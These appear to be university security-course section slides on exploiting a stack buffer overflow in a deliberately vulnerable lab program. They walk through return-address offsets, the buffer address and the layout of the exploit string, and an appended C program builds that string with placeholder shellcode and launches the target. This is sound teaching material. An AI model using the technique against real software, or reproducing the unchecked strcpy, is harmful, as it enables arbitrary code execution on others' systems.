CS 155 Section 1 – PP1
Eu-Jin Goh

Setting up Environment
  Demo

target1.c

    #include <string.h>   /* strcpy */

    /* foo() copies arg into out with no length check: out is main's
     * 64-byte buf, arg is the attacker-controlled argv[1]. */
    int foo( char *arg, char *out ) {
      strcpy( out, arg );
      return 0;
    }

    int main( int argc, char *argv[] ) {
      char buf[64];
      if ( argc != 2 ) { … }
      foo( argv[1], buf );
      return 0;
    }

Stack in target1 – layout (higher addresses at the top)

  argv[1]          == <shellcode + buf's address>
  argv[0]          == "/tmp/target1"
  argc
  $ra              – to which main() will return
  $fp              – saved frame pointer, for main's stack frame
  buf[64]
  ptr to buf       == "out"   // args to foo()
  ptr to argv[1]   == "arg"   // args to foo()

sploit1 – need:
  1. Location of the return address
     • addr on the stack of the $ra to overwrite
     • need main()'s $ra (not foo()'s): the overflow runs upward from buf, past main's saved $fp, into main's $ra; foo's own $ra lies below buf and is never reached
  2. Address of the buffer ("buf" in target1)
     • the address we want to force the program to jump to
  3. Distance between the buffer and $ra
     – this fixes the size of the overflow string

Buf addr
  • the address of target1's buf depends on the size of the exploit's overflow string
  • since the exploit string (argv[1]) lives above target1's buf on the stack, a longer string pushes everything below it further down
  • once the size of the exploit buffer is fixed, the address of target1's buf will not change

Details
  1. Size of the overflow string
     • buf addr = 0x9ffffb80 (as read in gdb)
     • reg ebp  = 0x9ffffbc8
     • difference is 0x48 = 72 bytes (the compiler leaves 8 bytes between buf[64] and the saved $fp)
     • string size = 72 + 4 (saved $fp) + 4 ($ra) + 1 (terminating NUL copied by strcpy) = 81
  2. Address of buf
     • buf = 0x9ffffe60
       (a different reading from the one above: only the buf-to-ebp distance carries over between runs; the absolute address is re-read once the exploit string size is fixed, as the Buf addr slide explains)

Crafting the exploit string
  • want the target to jump to the start of buf
  • place the shellcode (45 bytes) at the start of the string
  • $ra sits at offset 76 (72 + 4 bytes of saved $fp)
  • exploit string bytes 76..79 must hold the address of target1's buf (0x9ffffe60), written little-endian: 60 fe ff 9f
  • bytes 45..75 are filler; no byte before the terminating NUL may be 0, or strcpy stops early and $ra is never overwritten

Hints
  1. There are various ways of seizing control of program flow without overwriting the return address
  2. Learn what the esp and ebp registers point to during the stages of program execution
  3. Learn what happens to registers and memory during LEAVE (mov esp, ebp; pop ebp) and RET (pop eip)
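The Details and Crafting slides above, put together as an added example (not part of the section slides or of the assignment's sploit1.c skeleton): the $ra offset and string size are derived from the gdb readings, the string is laid out as shellcode, filler, little-endian address, NUL, and main() launches /tmp/target1 with it as argv[1] the way sploit1 does. The 45-byte shellcode is replaced by a NOP placeholder because the real bytes come from the assignment's shellcode.h; the constants PROBE_BUF, PROBE_EBP and TARGET_BUF are the slide's numbers, and the helper names are my own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define TARGET        "/tmp/target1"
#define TARGET_BUF    0x9ffffe60u  /* addr of target1's buf once the string size is fixed (slides) */
#define PROBE_BUF     0x9ffffb80u  /* buf addr read in gdb while measuring the distance (slides) */
#define PROBE_EBP     0x9ffffbc8u  /* main's %ebp read at the same time (slides) */
#define SHELLCODE_LEN 45           /* size of the assignment's shellcode (slides) */

/* Distance from the start of buf to main's saved return address:
 * (ebp - buf) bytes of buffer plus padding, then the 4-byte saved %ebp. */
static size_t ra_offset(uint32_t buf_addr, uint32_t ebp) {
    return (size_t)(ebp - buf_addr) + 4;
}

/* Overflow-string size: everything up to and including the 4-byte $ra,
 * plus the NUL that strcpy copies after it. */
static size_t overflow_size(uint32_t buf_addr, uint32_t ebp) {
    return ra_offset(buf_addr, ebp) + 4 + 1;
}

/* Lay out the exploit string: shellcode at offset 0 (where $ra will
 * point), NOP filler up to the $ra slot, ret_addr little-endian at
 * ra_off, then a terminating NUL.  Returns strlen(out), or 0 when the
 * layout cannot work (it does not fit, or a 0 byte would stop strcpy). */
static size_t build_sploit(char *out, size_t out_len,
                           const unsigned char *sc, size_t sc_len,
                           size_t ra_off, uint32_t ret_addr) {
    size_t n = ra_off + 4;
    if (sc_len > ra_off || out_len < n + 1) return 0;
    for (size_t i = 0; i < sc_len; i++)
        if (sc[i] == 0) return 0;
    for (int i = 0; i < 4; i++)
        if (((ret_addr >> (8 * i)) & 0xff) == 0) return 0;
    memcpy(out, sc, sc_len);
    memset(out + sc_len, 0x90, ra_off - sc_len);          /* NOP filler */
    for (int i = 0; i < 4; i++)                            /* little-endian x86 */
        out[ra_off + i] = (char)((ret_addr >> (8 * i)) & 0xff);
    out[n] = '\0';
    return n;
}

/* Builds the sploit1 string from the slide's numbers with a placeholder
 * shellcode (all NOPs, so it spawns nothing); returns its length, 0 on
 * failure.  out must hold at least overflow_size() bytes. */
static size_t demo_build(char *out, size_t out_len) {
    unsigned char sc[SHELLCODE_LEN];
    memset(sc, 0x90, sizeof sc);   /* placeholder for shellcode.h's bytes */
    return build_sploit(out, out_len, sc, sizeof sc,
                        ra_offset(PROBE_BUF, PROBE_EBP), TARGET_BUF);
}

int main(void) {
    char buf[128];
    size_t n = demo_build(buf, sizeof buf);
    if (n == 0) { fputs("layout does not fit\n", stderr); return 1; }
    printf("$ra offset %zu, overflow size %zu, strlen %zu\n",
           ra_offset(PROBE_BUF, PROBE_EBP),
           overflow_size(PROBE_BUF, PROBE_EBP), n);
    for (size_t i = 0; i < n; i++)
        printf("%02x%c", (unsigned char)buf[i],
               (i % 16 == 15 || i + 1 == n) ? '\n' : ' ');
    /* Same launch as the sploit1 skeleton: the target sees buf as argv[1]. */
    char *args[] = { TARGET, buf, NULL };
    char *env[] = { NULL };
    execve(TARGET, args, env);
    perror("execve");
    return 1;
}
```

The two rejection checks in build_sploit are the ones that bite in practice: a 0 byte anywhere in the shellcode or in the address makes strcpy stop before $ra is reached, which is why the slides' address 0x9ffffe60 (no zero bytes) is usable and why a buffer address ending in 00 would need a different target.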